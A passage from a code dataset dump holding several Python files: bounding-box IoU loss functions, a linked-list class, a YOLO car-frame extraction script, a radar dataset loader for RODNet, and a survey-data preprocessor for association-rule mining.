eps)\n\n # center distance\n # gt_cent_x = gt_bboxes[:, 0::2].mean(dim=-1, keepdims=True)\n # gt_cent_y = gt_bboxes[:, 1::2].mean(dim=-1, keepdims=True)\n # pr_cent_x = pr_bboxes[:, 0::2].mean(dim=-1, keepdims=True)\n # pr_cent_y = pr_bboxes[:, 1::2].mean(dim=-1, keepdims=True)\n # gt_cent = torch.cat([gt_cent_x, gt_cent_y], dim=-1)\n # pr_cent = torch.cat([pr_cent_x, pr_cent_y], dim=-1)\n # cent_dis = F.pairwise_distance(gt_cent, pr_cent)\n gt_cent_x = gt_bboxes[:, 0::2].mean(dim=-1)\n gt_cent_y = gt_bboxes[:, 1::2].mean(dim=-1)\n pr_cent_x = pr_bboxes[:, 0::2].mean(dim=-1)\n pr_cent_y = pr_bboxes[:, 1::2].mean(dim=-1)\n cent_dis = (gt_cent_x - pr_cent_x).pow(2.) + (gt_cent_y - pr_cent_y).pow(2.)\n\n # diag distance\n lt = torch.min(gt_bboxes[:, :2], pr_bboxes[:, :2])\n rb = torch.max(gt_bboxes[:, 2:], pr_bboxes[:, 2:])\n # diag_dis = F.pairwise_distance(lt, rb)\n diag_dis = (lt - rb).pow(2).sum(dim=-1)\n\n # diou\n # reg = (cent_dis / (diag_dis + eps)).pow(2.)\n reg = cent_dis / (diag_dis + eps)\n diou = iou - reg\n return diou\n\nlinear_diou = DIOULoss(eps=1e-5, reduction='mean')\n\ndef ciou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n cious: tensor (N, )\n \"\"\"\n diou = diou_func(gt_bboxes, pr_bboxes, eps)\n # ciou reg\n creg = CIOURegFunc.apply(gt_bboxes, pr_bboxes, eps)\n\n ciou = diou - creg\n return ciou\n\n\n\nclass CIOURegFunc(torch.autograd.Function):\n '''\n forward and backward of CIOU regularization term\n '''\n @staticmethod\n @amp.custom_fwd\n def forward(ctx, gt_bboxes, pr_bboxes, eps=1e-5):\n gt_w = gt_bboxes[:, 2] - gt_bboxes[:, 0]\n gt_h = gt_bboxes[:, 3] - gt_bboxes[:, 1]\n pr_w = pr_bboxes[:, 2] - pr_bboxes[:, 0]\n pr_h = pr_bboxes[:, 3] - pr_bboxes[:, 1]\n coef = 4. / (math.pi ** 2)\n atan_diff = torch.atan(gt_w / gt_h) - torch.atan(pr_w / pr_h)\n v = atan_diff.pow(2.)\n v = coef * v\n iou = iou_func(gt_bboxes, pr_bboxes, eps)\n alpha = v / (1 - iou + v)\n reg = alpha * v\n\n ## we compute gradient directly, since bbox does not use too much memory\n # grad of pred bbox\n # h2_w2 = 1. / (pr_h.pow(2.) + pr_w.pow(2.)) # org grad\n h2_w2 = 1. # replace with 1 as proposed in paper\n dv = 2 * coef * atan_diff * h2_w2 * alpha\n # this is negative of paper formula, but I think this is the right way\n dv_dh = dv * pr_w\n dv_dw = -dv * pr_h\n dx1, dx2 = -dv_dw.view(-1, 1), dv_dw.view(-1, 1)\n dy1, dy2 = -dv_dh.view(-1, 1), dv_dh.view(-1, 1)\n d_pr_bbox = torch.cat([dx1, dy1, dx2, dy2], dim=-1)\n\n # grad of gt bbox\n # h2_w2 = 1. / (gt_h.pow(2.) + gt_w.pow(2.)) # org grad\n h2_w2 = 1. # replace with 1 as proposed in paper\n dv = 2 * coef * atan_diff * h2_w2 * alpha\n dv_dh = dv * gt_w\n dv_dw = -dv * gt_h\n dx1, dx2 = -dv_dw.view(-1, 1), dv_dw.view(-1, 1)\n dy1, dy2 = -dv_dh.view(-1, 1), dv_dh.view(-1, 1)\n d_gt_bbox = -torch.cat([dx1, dy1, dx2, dy2], dim=-1)\n\n ctx.variables = d_gt_bbox, d_pr_bbox\n return reg\n\n @staticmethod\n @amp.custom_bwd\n def backward(ctx, grad_output):\n d_gt_bbox, d_pr_bbox = ctx.variables\n\n return d_gt_bbox, d_pr_bbox, None\n\n","sub_path":"pysot/models/iou_loss.py","file_name":"iou_loss.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363711131","text":"class Node:\n next=None\n data=None\n def __init__(self, data, next=None):\n self.data=data\n self.next=next\n\nclass LList:\n head=None\n def __init__(self, head):\n self.head=head\n def print(self):\n if(self.head==None):\n print(\"List is empty\")\n return\n current=self.head\n while(current.next!=None):\n print(\"%d\"%(current.data))\n current=current.next\n print(\"%d\"%(current.data))\n\n def delete(self, node):\n if(self.head==None):\n print(\"List is empty\")\n return\n\n current=self.head\n if(current.data==node.data):\n self.head = current.next\n current.next = None\n print(\"%s deleted\"%(current.data))\n return\n while(current.next!=None):\n if(current.next.data==(node.data)):\n temp=current.next\n current.next = (current.next).next\n temp.next = None\n print(\"%s deleted\"%(temp.data))\n return\n current = current.next\n if(current.next==None):\n self.head=None\n print(\"%s deleted\"%(current.data))\n return\n\n def insert(self, node):\n current=self.head\n if(current==None):\n self.head = node\n print(\"%s inserted\"%(node.data))\n return\n while(1):\n if(current.next==None):\n node.next=None\n current.next=node\n print(\"%s inserted\"%(node.data))\n return\n if(current.data==node.data):\n node.next = current.next\n current.next = node\n print(\"%s inserted\"%(node.data))\n return\n elif(current.datanode.data):\n node.next=current.next\n current.next=node\n print(\"%s inserted\"%(node.data))\n return\n current = current.next\n\n\n\nn1 = Node(100)\nn2 = Node(200)\nn3 = Node(300)\nn4 = Node(400)\nn5 = Node(500)\n\n\nlistHead=LList(n1)\nlistHead.print()\nlistHead.insert(n2)\nlistHead.insert(n4)\nlistHead.insert(n5)\nlistHead.print()\nlistHead.delete(n1)\n\nlistHead.print()\nlistHead.insert(n3)\nlistHead.print()\nlistHead.delete(n5)\nlistHead.print()\nlistHead.insert(n5)\nlistHead.print()\n\n\n'''\nlistHead = LList(n1)\nlistHead.print()\nlistHead.delete(n1)\nlistHead.print()\nlistHead.insert(n1)\nlistHead.print()\n'''","sub_path":"linked_list/single_linked_list.py","file_name":"single_linked_list.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"377360814","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 29 13:11:29 2021\n\nGet images with cars for labeling license plates.\n\n@author: michellegreene\n\"\"\"\n\nimport cv2\nimport glob\nimport numpy as np\n\n# path to video images\ninputPath = '/Volumes/etna/Scholarship/Michelle Greene/Students/Shared/Lewiston/'\n\n# path to output images\noutputPath = '/Volumes/etna/Scholarship/Michelle Greene/Students/Shared/carImages/'\n\n# make list of videos\nvidList = sorted(glob.glob(inputPath+'*.mp4'))\n\n# define YOLO parameters\nCONF_THRESH, NMS_THRESH = 0.5, 0.5\nconfig = \"yolo_files/yolov3-tiny.cfg\"\nweights = \"yolo_files/yolov3-tiny.weights\"\n\n# Load the network\nnet = cv2.dnn.readNetFromDarknet(config, weights)\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n# Get the output layer from YOLO\nlayers = net.getLayerNames()\noutput_layers = [layers[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# loop through videos\ncar = 0\nfor i in range(len(vidList)):\n # open video\n vid = cv2.VideoCapture(vidList[i])\n \n # loop through frames\n while vid.isOpened():\n \n # read a frame\n success, image = vid.read()\n # assumes that any failure is the end of the video\n if not success:\n break\n height, width = image.shape[:2]\n \n # use YOLOv3 to detect a car, bus, or truck\n # convert the image to blob and perform forward pass to get the \n #bounding boxes with their confidence scores\n blob = cv2.dnn.blobFromImage(image, 0.00392, (416, 416), swapRB=True, crop=False)\n net.setInput(blob)\n layer_outputs = net.forward(output_layers)\n \n class_ids, confidences, b_boxes = [], [], []\n for output in layer_outputs:\n for detection in output:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n\n if confidence > CONF_THRESH:\n if class_id in [2, 5, 7]:\n car += 1\n # write the image to file\n outname = 'car'+str(car)+'.jpg'\n cv2.imwrite(outputPath+outname, image)\n \n \n","sub_path":"saveVideoCars.py","file_name":"saveVideoCars.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"553730193","text":"import os\nimport time\nimport random\nimport pickle\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom torch.utils import data\n\nfrom .loaders import list_pkl_filenames, list_pkl_filenames_from_prepared\n\n\nclass CRDataset(data.Dataset):\n \"\"\"\n Pytorch Dataloader for CR Dataset\n :param detail_dir: data details directory\n :param confmap_dir: confidence maps directory\n :param win_size: seqence window size\n :param n_class: number of classes for detection\n :param step: frame step inside each sequence\n :param stride: data sampling\n :param set_type: train, valid, test\n :param is_random_chirp: random load chirp or not\n \"\"\"\n\n def __init__(self, data_dir, dataset, config_dict, split, is_random_chirp=False, subset=None, noise_channel=False):\n # parameters settings\n self.data_dir = data_dir\n self.dataset = dataset\n self.config_dict = config_dict\n self.n_class = dataset.object_cfg.n_class\n self.win_size = config_dict['train_cfg']['win_size']\n self.split = split\n if split == 'train' or split == 'valid':\n self.step = config_dict['train_cfg']['train_step']\n self.stride = config_dict['train_cfg']['train_stride']\n else:\n self.step = config_dict['test_cfg']['test_step']\n self.stride = config_dict['test_cfg']['test_stride']\n self.is_random_chirp = is_random_chirp\n self.n_chirps = 4\n self.noise_channel = noise_channel\n\n # Dataloader for MNet\n # if 'mnet_cfg' in self.config_dict['model_cfg']:\n # in_chirps, out_channels = self.config_dict['model_cfg']['mnet_cfg']\n # self.n_chirps = in_chirps\n # n_radar_chirps = self.config_dict['dataset_cfg']['radar_cfg']['n_chirps']\n # self.chirp_ids = []\n # for c in range(in_chirps):\n # self.chirp_ids.append(int(n_radar_chirps / in_chirps * c))\n\n # dataset initialization\n self.image_paths = []\n self.radar_paths = []\n self.obj_infos = []\n self.confmaps = []\n self.n_data = 0\n self.index_mapping = []\n\n if subset is not None:\n self.data_files = [subset + '.pkl']\n else:\n # self.data_files = list_pkl_filenames(config_dict['dataset_cfg'], split)\n self.data_files = list_pkl_filenames_from_prepared(data_dir, split)\n self.seq_names = [name.split('.')[0] for name in self.data_files]\n self.n_seq = len(self.seq_names)\n\n split_folder = split\n for seq_id, data_file in enumerate(tqdm(self.data_files)):\n data_file_path = os.path.join(data_dir, split_folder, data_file)\n data_details = pickle.load(open(data_file_path, 'rb'))\n if split == 'train' or split == 'valid':\n assert data_details['anno'] is not None\n n_frame = data_details['n_frame']\n self.image_paths.append(data_details['image_paths'])\n self.radar_paths.append(data_details['radar_paths'])\n n_data_in_seq = (n_frame - (self.win_size * self.step - 1)) // self.stride + (\n 1 if (n_frame - (self.win_size * self.step - 1)) % self.stride > 0 else 0)\n self.n_data += n_data_in_seq\n for data_id in range(n_data_in_seq):\n self.index_mapping.append([seq_id, data_id * self.stride])\n if data_details['anno'] is not None:\n self.obj_infos.append(data_details['anno']['metadata'])\n self.confmaps.append(data_details['anno']['confmaps'])\n\n def __len__(self):\n \"\"\"Total number of data/label pairs\"\"\"\n return self.n_data\n\n def __getitem__(self, index):\n\n seq_id, data_id = self.index_mapping[index]\n seq_name = self.seq_names[seq_id]\n image_paths = self.image_paths[seq_id]\n radar_paths = self.radar_paths[seq_id]\n if len(self.confmaps) != 0:\n this_seq_obj_info = self.obj_infos[seq_id]\n this_seq_confmap = self.confmaps[seq_id]\n\n data_dict = dict(\n status=True,\n seq_names=seq_name,\n image_paths=[]\n )\n\n if self.is_random_chirp:\n chirp_id = random.randint(0, self.dataset.sensor_cfg.radar_cfg['n_chirps'] - 1)\n else:\n chirp_id = 0\n\n # Dataloader for MNet\n if 'mnet_cfg' in self.config_dict['model_cfg']:\n chirp_id = [0,1,2,3]\n\n radar_configs = self.dataset.sensor_cfg.radar_cfg\n ramap_rsize = radar_configs['ramap_rsize']\n ramap_asize = radar_configs['ramap_asize']\n\n # Load radar data\n try:\n if radar_configs['data_type'] == 'RI' or radar_configs['data_type'] == 'AP': # drop this format\n radar_npy_win = np.zeros((self.win_size, ramap_rsize, ramap_asize, 2), dtype=np.float32)\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n radar_npy_win[idx, :, :, :] = np.load(radar_paths[frameid])\n data_dict['image_paths'].append(image_paths[frameid])\n elif radar_configs['data_type'] == 'RISEP' or radar_configs['data_type'] == 'APSEP':\n if isinstance(chirp_id, int):\n radar_npy_win = np.zeros((self.win_size, ramap_rsize, ramap_asize, 2), dtype=np.float32)\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n radar_npy_win[idx, :, :, :] = np.load(radar_paths[frameid][chirp_id])\n data_dict['image_paths'].append(image_paths[frameid])\n elif isinstance(chirp_id, list):\n radar_npy_win = np.zeros((self.win_size, self.n_chirps, ramap_rsize, ramap_asize, 2),\n dtype=np.float32)\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n for cid, c in enumerate(chirp_id):\n npy_path = radar_paths[frameid][c]\n radar_npy_win[idx, cid, :, :, :] = np.load(npy_path)\n data_dict['image_paths'].append(image_paths[frameid])\n else:\n raise TypeError\n elif radar_configs['data_type'] == 'ROD2021':\n radar_npy_win = np.zeros((self.win_size, self.n_chirps,ramap_rsize, ramap_asize, 2), dtype=np.float32) # only use chirp 0 for training\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n for cid, c in enumerate(chirp_id):\n npy_path = radar_paths[frameid][c]\n radar_npy_win[idx, cid, :, :, :] = np.load(npy_path)\n data_dict['image_paths'].append(image_paths[frameid])\n else:\n raise NotImplementedError\n except:\n # in case load npy fail\n data_dict['status'] = False\n if not os.path.exists('./tmp'):\n os.makedirs('./tmp')\n log_name = 'loadnpyfail-' + time.strftime(\"%Y%m%d-%H%M%S\") + '.txt'\n with open(os.path.join('./tmp', log_name), 'w') as f_log:\n f_log.write('npy path: ' + radar_paths[frameid][chirp_id] + \\\n '\\nframe indices: %d:%d:%d' % (data_id, data_id + self.win_size * self.step, self.step))\n # radar_npy_win = np.transpose(radar_npy_win, (3, 0, 1, 2))\n #\n # data_dict['radar_data'] = radar_npy_win\n #\n # if len(self.confmaps) != 0:\n # confmap_gt = this_seq_confmap[data_id:data_id + self.win_size * self.step:self.step]\n # confmap_gt = np.transpose(confmap_gt, (1, 0, 2, 3))\n # obj_info = this_seq_obj_info[data_id:data_id + self.win_size * self.step:self.step]\n #\n # data_dict['anno'] = dict(\n # obj_infos=obj_info,\n # confmaps=confmap_gt,\n # )\n # else:\n # data_dict['anno'] = None\n return data_dict\n\n # Dataloader for MNet\n if 'mnet_cfg' in self.config_dict['model_cfg']:\n radar_npy_win = np.transpose(radar_npy_win, (4, 1, 0, 2, 3))\n radar_npy_win=np.reshape(radar_npy_win, (8, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize']))\n assert radar_npy_win.shape == (8, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n else:\n radar_npy_win = np.transpose(radar_npy_win, (3, 0, 1, 2))\n assert radar_npy_win.shape == (2, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n\n data_dict['radar_data'] = radar_npy_win\n\n # Load annotations\n if len(self.confmaps) != 0:\n confmap_gt = this_seq_confmap[data_id:data_id + self.win_size * self.step:self.step]\n confmap_gt = np.transpose(confmap_gt, (1, 0, 2, 3))\n obj_info = this_seq_obj_info[data_id:data_id + self.win_size * self.step:self.step]\n if self.noise_channel:\n assert confmap_gt.shape == \\\n (self.n_class + 1, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n else:\n confmap_gt = confmap_gt[:self.n_class]\n assert confmap_gt.shape == \\\n (self.n_class, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n\n data_dict['anno'] = dict(\n obj_infos=obj_info,\n confmaps=confmap_gt,\n )\n else:\n data_dict['anno'] = None\n\n return data_dict\n","sub_path":"rodnet/datasets/CRDataset.py","file_name":"CRDataset.py","file_ext":"py","file_size_in_byte":9949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532593337","text":"# Global modules\nimport collections\nimport math\nimport time\n\n# Internal modules\nfrom src.utils import *\n\nclass PreProcessor:\n \"\"\"\n The preprocessor class that handles binarization and discretization of dataset\n \"\"\"\n def __init__(self):\n self.transactions = []\n self.unique = collections.OrderedDict()\n self.trans_count = 0\n self.mapper = PreProcessor.Mapper()\n\n def get_transactions(self):\n \"\"\"\n Getter method for transactions list of OrderedDict\n\n :return: Transactions list (list(OrderedDict))\n \"\"\"\n return self.transactions\n\n def get_uniques(self):\n \"\"\"\n Getter method for unique itemsets (dictionary)\n\n :return: Unique itemsets (dict), key: items, value: counts\n \"\"\"\n return self.unique\n\n def get_transaction_count(self):\n \"\"\"\n Getter method for transaction count after parsing the file\n\n :return: Transaction count (int)\n \"\"\"\n return self.trans_count\n\n def parse_file(self, file):\n \"\"\" The main function to parse the file and run the preprocesser methods\n\n :param file: Filepath of the data\n :return: Returns number of the transaction parsed (int)\n \"\"\"\n print(\"Preprocess begin to parse the file\")\n start_t = time.clock()\n mp = self.mapper\n with open(file, \"r\") as f:\n for line in f:\n chars = str(line)\n # Get all the necessary fields here\n sex = self.get_field(chars, mp.sex)\n race = self.get_field(chars, mp.race)\n score = self.get_field(chars, mp.score)\n lang_native=self.get_field(chars,mp.lang_native)\n fam_comp=self.get_field(chars,mp.fam_comp)\n par_edu=self.get_field(chars,mp.par_edu)\n income=self.get_field(chars,mp.income)\n s_expect=self.get_field(chars,mp.s_expect)\n control=self.get_field(chars,mp.control)\n sc_loc=self.get_field(chars,mp.sc_loc)\n fight=self.get_field(chars,mp.fight)\n late = self.get_field(chars, mp.late)\n homework = self.get_field(chars, mp.homework)\n sh_accomp = self.get_field(chars, mp.sh_accomp)\n sh_poorp = self.get_field(chars, mp.sh_poorp)\n good_grec = self.get_field(chars, mp.good_grec)\n likes_s = self.get_field(chars, mp.likes_s)\n library = self.get_field(chars, mp.library)\n\n # Add this into transaction. Put all the fields into the list\n fields = [sex, race, score, lang_native, fam_comp,\n par_edu,income, s_expect, control, sc_loc,\n fight, late, homework, sh_accomp, sh_poorp,\n good_grec, likes_s, library]\n\n self.add_transaction(fields)\n # Performance measurements\n total_t = str(format(time.clock() - start_t, '.4f'))\n print(\"Preprocessing took {:>10} seconds\"\n .format(total_t))\n # Return number of transactions added\n return self.trans_count\n\n def get_field(self, line, mapper):\n \"\"\"\n Selects the appropriate preprocessing method according to line and mapper structure\n :param line: New line of data (str)\n :param mapper: Corresponding mapper structure of the field\n :return: Preprocessed field (str)\n \"\"\"\n value = line[mapper['STR'] - 1: mapper['END']]\n # Check the type and execute either discretize/binarize etc.\n if mapper['TYPE'] == 'BINARY':\n return self._is_name(mapper['COL'], mapper['VALS'][int(value)])\n elif mapper['TYPE'] == 'CATEGORICAL':\n return self.binarize(mapper, int(value)) # Change here later for OTHER field\n else:\n return self.discretize(mapper, float(value))\n\n def add_transaction(self, fields):\n \"\"\"\n Adds the preprocessed fields into the transaction list\n\n :param fields: Preprocessed fields (list)\n :return:\n \"\"\"\n self.trans_count += 1\n items = collections.OrderedDict()\n # Add the fields here, True is only used to have\n # OrderedSet kind of data structure\n items = collections.OrderedDict({f: True for f in fields}) # more pythonic way to populate\n self.count_unique(fields) # Updates unique dict\n # Use keys to sort the dict\n items = collections.OrderedDict(sorted(items.items(), key=lambda _: _[0]))\n t = {'ID': self.trans_count, 'ITEMS': items}\n self.transactions.append(t)\n\n def count_unique(self, fields):\n \"\"\"\n Updates the count of unique fields\n\n :param fields: List of fields\n :return:\n \"\"\"\n for f in fields:\n if f not in self.unique:\n self.unique[f] = 1\n else:\n self.unique[f] += 1\n self.unique = collections.OrderedDict(sorted(self.unique.items(), key=lambda _: _[0]))\n\n def discretize(self, mapper, col_data):\n \"\"\"\n Used to discretize the continous values from the given mapper and value\n :param mapper: Mapper of the continious field (Mapper Class)\n :param col_data: Value of the continous field (float)\n :return: Returns discretized name of the field (string)\n \"\"\"\n max = math.ceil(mapper['MAX'])\n min = math.floor(mapper['MIN'])\n interval = mapper['INTERVAL']\n step = (max - min) / interval\n # Initial check to decide in which range it belongs to\n lower = float(format(min, '.2f'))\n upper = float(format(lower + step, '.2f'))\n if col_data >= lower and col_data <= upper:\n str_interval = '[' + str(int(lower)) + '-' + str(int(upper)) + ']'\n # print('Lower : ' + str(lower) + ' Upper : ' + str(upper)\n # + ' Value : ' + str(col_data) + ' Interval : ' + str_interval)\n return self._is_name(mapper['COL'], str_interval)\n\n # Check the boundries until the end of the interval value\n for i in range(1, interval):\n lower = float(format(upper, '.2f'))\n upper = float(format(upper + step, '.2f'))\n if col_data >= lower and col_data <= upper:\n str_interval = '[' + str(int(lower)) + '-' + str(int(upper)) + ']'\n # print('Lower : ' + str(lower) + ' Upper : ' + str(upper)\n # + ' Value : ' + str(col_data) + ' Interval : ' + str_interval)\n return self._is_name(mapper['COL'], str_interval)\n\n raise ValueError('Value is not between the intervals check preprocessor::discretize')\n\n def binarize(self, mapper, col_data):\n \"\"\"\n Binarize the attribute data using mapper\n :param col_data: Categorical data assumed to be between -9 and 25\n :param mapper: Corresponding mapper of this field\n :return: Binarized field (str)\n \"\"\"\n if mapper is None:\n print(\"Give an appropriate mapper\")\n return\n\n if col_data < -9:\n raise ValueError('Values cannot be less than -9 - check binarize method in preprocess.py')\n\n # Change this, in case if we break something\n max_categorical_value = 25\n if col_data > max_categorical_value:\n raise ValueError('Values cannot be more than 25 - check binarize method in preprocess.py')\n\n # Return proper COL_IS_ATTR name\n if col_data in mapper['VALS'].keys():\n if mapper['OTHERS'] is not None:\n if col_data in mapper['OTHERS']:\n # Others\n nm = self._is_name(col=mapper['COL'], attr=\"OTHERS\")\n elif col_data in mapper['VALS']:\n # Map as standalone field\n nm = self._is_name(col=mapper['COL'], attr=mapper['VALS'][col_data])\n else:\n raise Exception(\"Something unusual in preprocessor::binarize happened\")\n else:\n # Map as standalone field\n nm = self._is_name(col=mapper['COL'], attr=mapper['VALS'][col_data])\n\n # Return the name\n return nm\n else:\n raise ValueError('This key is not inside our mapper VALS - check binarize method in preprocess.py')\n\n def save_transactions(self, path = \"transactions.csv\"):\n \"\"\"\n Save the preprocessed transactions into a file\n :param path: Path to be saved\n :return: Returns true on successful save\n \"\"\"\n print('Saving the transactions into {}'.format(path))\n start_t = time.clock()\n with open(path, 'w') as f:\n f.write(\"ID,ITEMS\\n\")\n for t in self.transactions:\n print_str = str(t['ID'])\n for i in t['ITEMS'].keys():\n print_str += \",\" + i\n print_str += \"\\n\"\n f.write(print_str)\n # Performance measurements\n total_t = str(format(time.clock() - start_t, '.4f'))\n print(\"Save procedure took {:>10} seconds\"\n .format(total_t))\n return True\n\n def _print_transactions(self):\n \"\"\"\n Used to print transactions in csv format\n :return:\n \"\"\"\n print_str = \"ID,ITEMS\\n\"\n for t in self.transactions:\n print_str += str(t['ID'])\n for i in t['ITEMS'].keys():\n print_str += \",\" + i\n print_str += \"\\n\"\n print(print_str)\n\n def _is_name(self, col, attr):\n \"\"\"\n Used to construct the itemset name with combination of column and attiribute\n :param col: Column name of the data (str)\n :param attr: Attribute name of the data (str)\n :return: Itemset name (str)\n \"\"\"\n return col.upper() + \"_IS_\" + attr.upper()\n\n # Until getting nice representation using files(possibly JSON) use this structure\n # later we can create the file structure and parser for that.\n class Mapper:\n \"\"\"\n Used to map the fields\n \"\"\"\n def __init__(self):\n # Some fields can change\n self.sex = {'COL': 'SEX', 'TYPE': 'BINARY', 'STR': 24, 'END': 25,\n 'OTHERS': None,\n 'VALS': {1: 'MALE', 2: 'FEMALE'}}\n\n # Combine fields that are in others together\n self.race = {'COL': 'RACE', 'TYPE': 'CATEGORICAL', 'STR': 26, 'END': 27,\n 'OTHERS': {4: 'HISP_NR', 5: 'HISP_RC', 3: 'BLACK'},\n 'VALS': {1: 'AMER', 2: 'ASIA', 3: 'BLACK',\n 4: 'HISP_NR', 5: 'HISP_RC', 6: 'MULT',\n 7: 'WHITE'}}\n\n # SCORE_IS-20_60 , 35.12\n self.score = {'COL': 'SCORE', 'TYPE': 'CONTINIOUS', 'STR': 106, 'END': 111,\n 'MIN': 20.91, 'MAX': 81.04, 'INTERVAL': 5}\n\n # Whether English is student's native language-composite\n self.lang_native = {'COL': 'ENG_LANG_NATIVE', 'TYPE': 'BINARY', 'STR': 28, 'END': 29,\n 'OTHERS': None,\n 'VALS': {0: 'NO', 1: 'YES'}}\n\n # Family composition\n self.fam_comp = {'COL': 'FAM', 'TYPE': 'CATEGORICAL', 'STR': 42, 'END': 43,\n 'OTHERS':{4: 'GG', 5: 'M', 6: 'F', 7: 'FEG', 8: 'MAG',9: 'HALFTIME'},\n 'VALS': {1: 'MF', 2: 'MG', 3: 'FG',\n 4: 'GG', 5: 'M', 6: 'F',\n 7: 'FEG', 8: 'MAG',9: 'HALFTIME'}}\n\n # Parents' highest level of education\n self.par_edu = {'COL': 'PAR_EDU', 'TYPE': 'CATEGORICAL', 'STR': 44, 'END': 45,\n 'OTHERS': None,\n 'VALS': {1: 'UHS', 2: 'HS', 3: 'US',\n 4: 'S', 5: 'UC', 6: 'C',\n 7: 'M', 8: 'PHD'}}\n\n # Total family income from all sources 2001-composite\n self.income = {'COL': 'INCOME', 'TYPE': 'CATEGORICAL', 'STR': 54, 'END': 55,\n 'OTHERS': {1: 'NONE', 2: '0-1K', 3: '1-5K'},\n 'VALS': {1: 'NONE', 2: '0-1K', 3: '1-5K',\n 4: '5-10K', 5: '10-15K', 6: '15-20K',\n 7: '20-25K', 8: '25-35K', 9: '35-50K',\n 10: '50-75K', 11: '75-100K',12: '100-200K',\n 13: '200K-more'}}\n\n # How far in school student thinks will get-composite\n self.s_expect = {'COL': 'S_EXPEC', 'TYPE': 'CATEGORICAL', 'STR': 72, 'END': 73,\n 'OTHERS': None,\n 'VALS': {-1:'UK',\n 1: 'UHS', 2: 'HS', 3: 'S',\n 4: 'UC', 5: 'C', 6: 'M',\n 7: 'PHD'}}\n\n # School control\n self.control = {'COL': 'SC_CTRL', 'TYPE': 'CATEGORICAL', 'STR': 253, 'END': 253,\n 'OTHERS': None,\n 'VALS': {1: 'PUB', 2: 'CAT', 3: 'PRI'}}\n\n # School urbanicity\n self.sc_loc = {'COL': 'SC_LOC', 'TYPE': 'CATEGORICAL', 'STR': 254, 'END': 254,\n 'OTHERS': None,\n 'VALS': {1: 'UR', 2: 'SUB', 3: 'RU'}}\n\n # Got into a physical fight at school\n self.fight = {'COL': 'FIGHT', 'TYPE': 'CATEGORICAL', 'STR': 336, 'END': 337,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP'},\n 'VALS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n 1: 'NEVER', 2: '1-2', 3: '2-MORE'}}\n\n # Got into a physical fight at school\n self.late = {'COL': 'LATE', 'TYPE': 'CATEGORICAL', 'STR': 358, 'END': 359,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP'},\n 'VALS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n 1: 'NEVER', 2: '1-2', 3: '3-6',\n 4: '7-9', 5: '10-more'}}\n\n # How often student completes homework\n self.homework = {'COL': 'HOMEWORK', 'TYPE': 'CATEGORICAL', 'STR': 1610, 'END': 1611,\n 'OTHERS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS',-1 : 'DONT_K'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS',-1 : 'DONT_K',\n 1: 'NEVER', 2: 'RARELY', 3: 'SOMET',\n 4: 'MOSTT', 5: 'ALLT'}}\n\n # Spoke to parents about accomplishments (English)\n self.sh_accomp = {'COL': 'SH_ACCOMP', 'TYPE': 'CATEGORICAL', 'STR': 1590, 'END': 1591,\n 'OTHERS': {-9: 'MISSING', -4: 'NO_ASW', -3: 'SKIP_ANS'},\n 'VALS': {-9: 'MISSING', -4: 'NO_ASW', -3: 'SKIP_ANS',\n 0: 'NO', 1: 'YES'}}\n\n #Spoke to parents about poor performance (English)\n self.sh_poorp = {'COL': 'SH_POORP', 'TYPE': 'CATEGORICAL', 'STR': 1582, 'END': 1583,\n 'OTHERS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -4: 'NO_ASW',\n -3: 'SKIP_ANS',\n 0: 'NO', 1: 'YES'}}\n\n # Recognized for good grades\n self.good_grec = {'COL': 'RECOG', 'TYPE': 'CATEGORICAL', 'STR': 350, 'END': 351,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP'},\n 'VALS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n 0: 'NO', 1: 'YES'}}\n\n # How much likes school\n self.likes_s = {'COL': 'LIKES_S', 'TYPE': 'CATEGORICAL', 'STR': 428, 'END': 429,\n 'OTHERS': {-9: 'MISSING', -6: 'MUL_RESP',-1 : 'DONT_K'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -1 : 'DONT_K',\n 1: 'NO', 2: 'SOME', 3: 'YES'}}\n\n # Use of school library for assignments\n self.library = {'COL': 'LIBRARY', 'TYPE': 